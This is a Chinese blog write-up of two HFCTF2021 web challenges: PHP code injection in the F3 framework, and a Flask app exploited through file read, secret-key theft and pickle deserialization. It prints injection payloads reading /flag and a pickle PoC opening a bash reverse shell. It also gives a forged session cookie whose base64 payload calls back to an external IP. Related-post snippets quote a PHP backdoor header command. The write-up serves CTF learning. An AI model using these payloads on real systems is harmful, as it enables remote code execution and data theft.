HFCTF2021复现

最新推荐文章于 2024-07-18 21:55:08 发布
最新推荐文章于 2024-07-18 21:55:08 发布
阅读量1.1k 收藏 1
点赞数 2
分类专栏: Write Up 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_jcak/article/details/123516439
版权

[HFCTF2021 Quals]Unsetme

1、F3框架,unset将参数a拼接进去,可以闭合

在这里插入图片描述

2、测试

​ payload

?a=a%0a);%0aphpinfo(

在这里插入图片描述

3、读取flag

?a=a%0a);%0aecho file_get_contents(%27/flag%27

在这里插入图片描述

[HFCTF 2021 Final]easyflask

1、源码,很明显的pickle反序列化

pickle官方文档

#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET_KEY"] = "*******"

User = type('User', (object,), {
    'uname': 'test',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index_handler():
    if not session.get('u'):
        u = pickle.dumps(User())
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        return 'uhh?'

    if u.is_admin == 1:
        return 'welcome, admin'
    else:
        return 'who are you?'


if __name__ == '__main__':
    app.run('0.0.0.0', port=80, debug=False)

2、读取secret_key

/proc/self/environ下读取

/file?file=/proc/self/environ

在这里插入图片描述

3、利用反序列化与伪造session

构造反序列化poc,注意要在linux系统下运行,因为pickle在windows和linux下生成的序列化字符不一样

import pickle
from base64 import b64encode
import os

User = type('User', (object,), {
    'uname': 'tyskill',
    'is_admin': 0,
    '__repr__': lambda o: o.uname,
    '__reduce__': lambda o: (os.system, ("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'",))
})
u = pickle.dumps(User())
print(b64encode(u).decode())

伪造session,用flask_session_cookie_manager

python3 flask_session_cookie_manager3.py encode -s 'glzjin22948575858jfjfjufirijidjitg3uiiuuh' -t "{'u':{'b':'Y3Bvc2l4CnN5c3RlbQpwMAooUyJiYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEyNC4yMjIuMTcwLjI0MS84ODg4IDA+JjEnIgpwMQp0cDIKUnAzCi4='}}"

在这里插入图片描述

Y3pro
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用numpy复现贝叶斯网络
10-16
在这个主题中,我们将深入探讨如何使用Python的科学计算库NumPy来复现贝叶斯网络的基本概念和操作。NumPy是Python生态系统中的核心库,提供了高效的多维数组对象和各种数学函数,非常适合进行数值计算。 首先,我们...
虎符ctf2021 web writeup
weixin_45805993的博客
04-09 853
1.签到 https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d php git仓库后门 2.unsetme 源码 <?php // Kickstart the framework $f3=require('lib/base.php'); $f3->set('DEBUG',0); if ((float)PCRE_VERSION<8.0) trigger_error('PCRE v
CTF-Web习题:[HFCTF2021]Unsetme
最新发布
LJW123487的博客
07-18 427
本题涉及知识点:php代码执行漏洞,payload的编辑
session.upload_progress文件包含
Aiwin的博客
05-29 833
session.upload_progress文件包含
2021[HFCTF]虎符杯网络安全赛道re部分wp
n1ptune__的博客
04-07 1318
CrackMe 这题是使用c++写的,因为无符号表,ida对c++的解析不是很友好,可以去了解一下c++的string类型的结构,对解题很有帮助,推荐看这篇文章链接: https://bbs.pediy.com/thread-230312.htm. 程序先将长度为17位的输入分为7位和10位两部分 再输入一个数要求满足一定条件 直接爆破 #include <stdio.h> #include <stdlib.h> #include <math.h> double f
从HFCTF学习JWT伪造
蚁景网安学院
04-23 1196
刚打完比赛,来总结下
tiki组件:CVE-2020-15906 && CVE-2021-26119复现
11-24
这两个CVE(Common Vulnerabilities and Exposures)——CVE-2020-15906 和 CVE-2021-26119,都是针对Tiki组件的安全漏洞,可能导致恶意攻击者能够获取未经授权的访问权限或执行恶意代码。 **CVE-2020-15906**,被...
CTFSHOW国赛复现-----Unzip(软连接利用)
qq_73767109的博客
06-04 2056
因为解压的目录更改了,所以要把解压文件所在目录放在var/www/html(因为html目录下是web环境)这样才能在解压shell文件时实现getshell。这里利用linux构造软连接使得上传文件指向到var/www/html目录下。接下来就是在var/www/html目录下上传一个shell文件就可以了。再上传该压缩包,因为解压后的目录同名所以会覆盖原指定目录。所以此时目录是var/www/html/cmd.php。在test的目录下创建一句话php文件。--symlinks表示压缩软连接。
[BUUCTF-n1book][第二章 web进阶]SSRF Training
nareku的博客
07-24 771
随便看看,发现了源码先代码审计(又臭又长的代码审计好讨厌捏…)限制了协议和ip地址。这里忽略了paerse_url()和curl同时处理url的差异,因此我们可以差异来进行绕过。前面已经测试过parse_url()函数得到如下结果可以看到parse_url是以www.baidu.com为目标的那么整理一下代码逻辑就是先检测是否为内网ip,通过parse_url,最后通过curl来完成请求。那么绕过方法就是让parse_url来处理外部ip,curl来处理内网ip。...
[HFCTF 2022]两道web题目wp
cosmoslin的博客
03-28 6659
ezphp <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 看到这段代码不难联想到P神的博客 我是如何利用环境变量注入执行任意命令 题目给了一个docker用于本地搭建环境,可以发现题目用的系统环境为debian。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash。 由于
2021-虎符网络安全赛道-hatenum | exp()函数与正则过滤
一醉一休的博客
09-28 1218
挺质量的一道题目
[HFCTF 2021] final web复现
weixin_63231007的博客
07-06 652
flasksession伪造&pickle反序列化 + Laravel&phar反序列化 + exp()溢出盲注
HFCTF-2021-Final-easyflask
LYJ20010728的博客
05-31 1648
HFCTF-2021-Final-easyflask考点思路Payload 考点 Python os.path.join trick、环境变量暴露敏感信息、pickle 反序列化 RCE、Flask Session 伪造 思路 进入题目,hint提示/file?file=index.js,进去之后又提示Source at /app/source,获得源码信息 注意 /file 路由,用户上传的 path 会被拼接到 static 目录后面,这里有个trick,当 os.path.join 的第二个参
2021虎符初赛Web部分题解
feng的博客
04-05 1448
前言 这个WP还是直接复制粘贴的当时随手写的WP。。。太懒了别骂了呜呜呜。。。 签到 几天前PHP的那个后门,当时笑死我了的那个User-Agentt。 User-Agentt: zerodiumsystem("cat /flag"); unsetme fatfree框架,搜一下有一个漏洞符合,即3.7.1的代码注入,但是题目打不通,怀疑是因为版本的问题,下载3.7.3的fatfree看一下,主要是这部分: $val=preg_replace('/^(\$hive)/','$this->hive',
[HFCTF 2021 Final]easyflask
weixin_43610673的博客
06-20 1650
任意文件读取,根据提示读取源码 #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type('User', (object,), { 'uname'
2021虎符CTF-Web前三题
Y4tacker的博客
04-04 1533
文章目录web签到unset慢慢做管理系统 web 签到 一个最近刚爆出来的php后门,直接一把梭 User-Agentt: zerodiumsystem("cat /flag"); unset 一开始百度搜一下发现是fatfree框架,然后github一瞬间获取源码,本地搭建发现报错嘻嘻 syntax error, unexpected '.', expecting :: (T_PAAMAYIM_NEKUDOTAYIM) [G:\phpstudy_pro\WWW\yyds.top\lib\base.ph
CVE-2021-28041复现
03-13
CVE-2021-28041是一个安全漏洞,它影响了某个软件或系统的特定版本。由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和建议。 要复现CVE-2021-28041漏洞,通常需要以下步骤: 1. 确定受影响的软件或系统版本:首先,你需要确定你使用的软件或系统是否受到CVE-2021-28041漏洞的影响。可以查看相关厂商或组织发布的安全公告或漏洞报告来获取这些信息。 2. 了解漏洞的详细信息:阅读CVE-2021-28041漏洞的详细描述和相关文档,了解漏洞的原理和影响范围。这将帮助你更好地理解漏洞,并为复现做好准备。 3. 搭建实验环境:在一个安全的环境中,搭建一个与受影响软件或系统版本相匹配的实验环境。这可以是一个虚拟机、容器或者专门用于安全测试的实验环境。 4. 复现漏洞:根据漏洞的描述和相关文档,尝试复现CVE-2021-28041漏洞。这可能涉及到构造特定的输入、触发特定的操作或者利用软件或系统中的某个弱点。 5. 验证漏洞:一旦成功复现漏洞,验证漏洞的存在和影响。这可以通过观察系统行为、获取敏感信息或者执行未授权的操作来进行验证。 请注意,复现漏洞是一项敏感的活动,需要在合法授权和合法范围内进行。在进行任何安全测试之前,请确保你已经获得了相关授权,并遵守法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值